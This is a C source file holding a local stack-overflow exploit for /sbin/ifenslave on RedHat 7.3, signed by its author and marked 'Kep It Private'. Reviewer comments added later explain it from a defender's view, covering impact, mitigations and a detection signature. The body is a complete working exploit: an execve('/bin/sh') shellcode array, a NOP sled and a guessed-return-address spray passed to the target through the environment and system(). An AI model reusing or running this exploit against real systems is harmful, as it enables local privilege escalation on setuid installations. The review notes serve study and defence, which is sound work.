/*
 * 0x333shit => /sbin/ifenslave exploit
 *
 * tested on RedHat 7.3 (Vallhall)
 * coded by c0wboy of 0utSid3rs
 * | www.0x333.org |
 *
 * Is Not Suid Of Defaul
 * Kep It Private Or Died!!!
 */

/*
 * NOTE(review): local stack-smashing proof of concept, read here from a
 * defender's point of view.
 *
 * What the listing does: it builds two environment strings, OUT (a long
 * run of 0x90 bytes followed by the payload below) and RET (one guessed
 * address repeated), then runs `/sbin/ifenslave $RET` through system().
 *
 * What the listing does not show: the flawed code in ifenslave itself.
 * Presumably the program copies its first command-line argument into a
 * fixed-size stack buffer without a length check -- confirm against the
 * ifenslave source before relying on this description.
 *
 * Impact: the child process runs with the caller's privileges unless
 * ifenslave is installed setuid, which the author's header says is not
 * the default. Keeping the binary non-setuid removes the privilege
 * boundary this code is aimed at.
 *
 * Mitigation: bound the argument copy in the target. A non-executable
 * stack and address-space randomisation each invalidate the
 * fixed-address guess that get_sp() provides.
 */

/* NOTE(review): the header names were lost when this page was extracted;
 * the bare directives are kept exactly as found. The calls below
 * (malloc, atoi, putenv, system, fprintf, strlen, memcpy) need the usual
 * standard headers to be declared. */
#include
#include

#define OUTSIDE 31337   /* size in bytes of the OUT environment string */
#define BUFFER  60      /* size in bytes of the RET environment string */
#define OFFST   0       /* default offset subtracted from the stack pointer */
#define NOP     0x90    /* x86 single-byte no-op used as filler */

#define GREEN "\033[32m" //some colors
#define RED "\033[31m"
#define NORM "\033[0m"
/* NOTE(review): GREEN, RED and NORM are not referenced anywhere in the
 * code visible on this page. */

/*
 * Payload bytes. The sequence contains `\xb0\x0b` and `\xcd\x80` (load
 * 0x0b, then int 0x80) and ends in the literal "/bin/sh"; it appears to
 * be the widely published i386 Linux execve("/bin/sh") stub followed by
 * an exit call. For detection, a very large environment string made of
 * 0x90 bytes that ends in these bytes is a long-standing signature.
 */
unsigned char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88"
    "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3"
    "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
    "\xff\xff/bin/sh";

/*
 * Copies the stack pointer into %eax with inline assembly.
 *
 * There is no return statement: the function relies on %eax being the
 * i386 return-value register, which is undefined behaviour as far as C
 * is concerned and holds only when the compiler leaves %eax alone after
 * the asm statement. The asm has no output or clobber list. 32-bit x86
 * only.
 */
unsigned long get_sp()
{
    __asm__("movl %esp, %eax");
}

/*
 * Builds the RET and OUT environment strings and launches ifenslave.
 *
 * argv[1], when given, is an integer offset subtracted from this
 * process's own stack pointer to form the guessed address.
 *
 * NOTE(review): `main` is declared with implicit int and returns no
 * value; neither malloc() result is checked before being written to.
 */
main( int argc, char *argv[] )
{
    int x;
    char *buf, *out, *scooby; // scooby dooby doooooo :)
    long ret , *add_ptr ;
    int offset=OFFST;

    /* atoi() reports no errors: non-numeric input silently yields 0. */
    if ( argc > 1 )
        offset = atoi( argv[1] );

    buf = malloc(BUFFER); /* ret address */
    out = malloc(OUTSIDE); /* shellcode + nop */

    /* The guess is this process's stack pointer minus the offset; it is
     * only meaningful when stack addresses are the same from one process
     * to the next, i.e. without address randomisation. */
    ret = get_sp() - offset;

    /* Fill buf with copies of ret. The index advances 4 bytes per stored
     * long, so the loop assumes sizeof(long) == 4; on a build where long
     * is 8 bytes it would write past the 60-byte allocation. */
    scooby = buf;
    add_ptr = (long *) scooby;

    for ( x = 0 ; x < BUFFER ; x += 4 )
    {
        *(add_ptr++) = ret;
    }

    /* Fill out with NOP bytes, leaving room for the payload plus one
     * terminating byte. The comparison mixes int x with the size_t
     * result of strlen(), and shellcode is unsigned char[] where
     * strlen() expects const char *. */
    scooby = out;

    for ( x = 0 ; x < OUTSIDE - strlen(shellcode) - 1 ; x++ )
    {
        *(scooby++) = NOP;
    }

    /* Append the payload right after the NOP run. */
    for (x = 0 ; x < strlen(shellcode) ; x++)
    {
        *(scooby++) = shellcode[x];
    }

    /* NUL-terminate both buffers so they are valid C strings. */
    buf[BUFFER- 1] = '\0';
    out[OUTSIDE- 1] = '\0';

    /* Overwrite the first four bytes of each buffer with "NAME=" so the
     * strings have the form putenv() expects. putenv() stores the
     * pointer itself rather than a copy, so both buffers must stay
     * allocated. */
    memcpy ( out , "OUT=" , 4 ) ;
    putenv(out);

    memcpy ( buf , "RET=" , 4 ) ;
    putenv(buf);

    /* Banner. It prints /bin/ifenslave while the command below runs
     * /sbin/ifenslave. */
    fprintf( stdout, "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n");
    fprintf( stdout, " ~ 0x333shit - /bin/ifenslave sploit ~ \n");
    fprintf( stdout, " ~ by c0wboy of 0utSid3rs ~ \n");
    fprintf( stdout, " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n");
    /* NOTE(review): ret is a long but the conversion is %08x, which
     * expects unsigned int -- a format/argument type mismatch. */
    fprintf( stdout, " [~] ret address : 0x%08x\n", ret);
    fprintf( stdout, " [~] sending evil string ...\n\n");

    /* system() starts a shell, which expands $RET into ifenslave's
     * argument; OUT is inherited by the child through the environment. */
    system("/sbin/ifenslave $RET");
}